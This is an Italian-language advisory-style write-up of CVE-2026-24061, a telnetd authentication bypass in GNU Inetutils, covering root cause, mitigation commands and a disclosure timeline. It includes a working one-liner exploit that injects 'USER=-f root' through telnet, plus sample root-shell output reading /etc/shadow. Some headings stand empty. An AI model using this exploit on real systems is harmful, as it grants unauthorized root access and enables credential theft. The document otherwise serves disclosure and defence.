
CVE-2026-24061
Bypass critico dell'autenticazione remota in GNU Inetutils telnetd
Il fantasma del 2015 è tornato per possedere tutto ciò che esegue ancora telnet.
Zero autenticazione. Una variabile d'ambiente. Shell root immediata.
CVE-2026-24061 è una vulnerabilità critica di escalation dei privilegi remota in GNU Inetutils telnetd ≤ 2.7.
Un attaccante remoto non autenticato imposta la variabile d'ambiente USER a "-f root" tramite l'opzione Telnet NEW-ENVIRON.
telnetd la passa non sanificata direttamente a /bin/login → login vede -f root → salta tutta l'autenticazione → fa cadere l'attaccante in una shell root.
Il codice pericoloso è rimasto silenzioso nell'albero per quasi 11 anni (dal ~2015).
"Una var d'ambiente. Nessuna password. Root completo. Benvenuto nel 2026."
Realtà a marzo 2026:
Quando telnetd riceve un'opzione NEW-ENVIRON contenente:
USER=-f root
Aggiunge il valore direttamente a argv passato a /bin/login:
execve("/bin/login", ["login", "-f", "root", ...], ...)
Il binario login interpreta -f root come:
"questo utente è già autenticato come root — nessun controllo password necessario."
→ L'attaccante ottiene il prompt #. Game over.
Scelta progettuale fatale: l'inoltro di -R / variabili d'ambiente non è mai stato limitato agli utenti autorizzati.
Versioni vulnerabili: GNU Inetutils telnetd 1.9.3 – 2.7
Obiettivi comuni nel 2026:
Sicuri:
Comando one-liner (qualsiasi Linux/macOS con client telnet):
USER="-f root" telnet -a 192.168.1.50
Output tipico:
┌──(attacker㉿kali)-[~]
└─$ USER="-f root" telnet -a 192.168.1.50
Trying 192.168.1.50...
Connected to 192.168.1.50.
Escape character is '^]'.
Debian GNU/Linux 12 telnetd
root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
...
Con un solo Invio — accesso root completo.
telnet localhost 23 # look for inetutils banner
inetutils-telnetd --version # vulnerable if ≤ 2.7
systemctl disable --now inetutils-inetd # or telnet.socket
pkill telnetd && chmod -x /usr/sbin/telnetd
sudo apt update && sudo apt install --reinstall inetutils-telnetd # → ≥2.8
iptables -A INPUT -p tcp --dport 23 -j DROP
ufw deny 23/tcp
| Data | Evento |
|---|
| ~Marzo 2015 | Introdotta la gestione vulnerabile delle env |
| Gen 2026 | Segnalazione privata ai maintainer upstream |
| Fine gen 2026 | Divulgazione pubblica e assegnazione CVE |
| Fine gen 2026 | Fix rilasciato (Inetutils ≥ 2.8) |
| 26 gen 2026 | Aggiunto al catalogo CISA Known Exploited Vulnerabilities |
| Feb–Mar 2026 | Picchi di sfruttamento contro sistemi legacy/OT |
| Marzo 2026 | Molti vendor embedded ancora silenziosi o non aggiornati |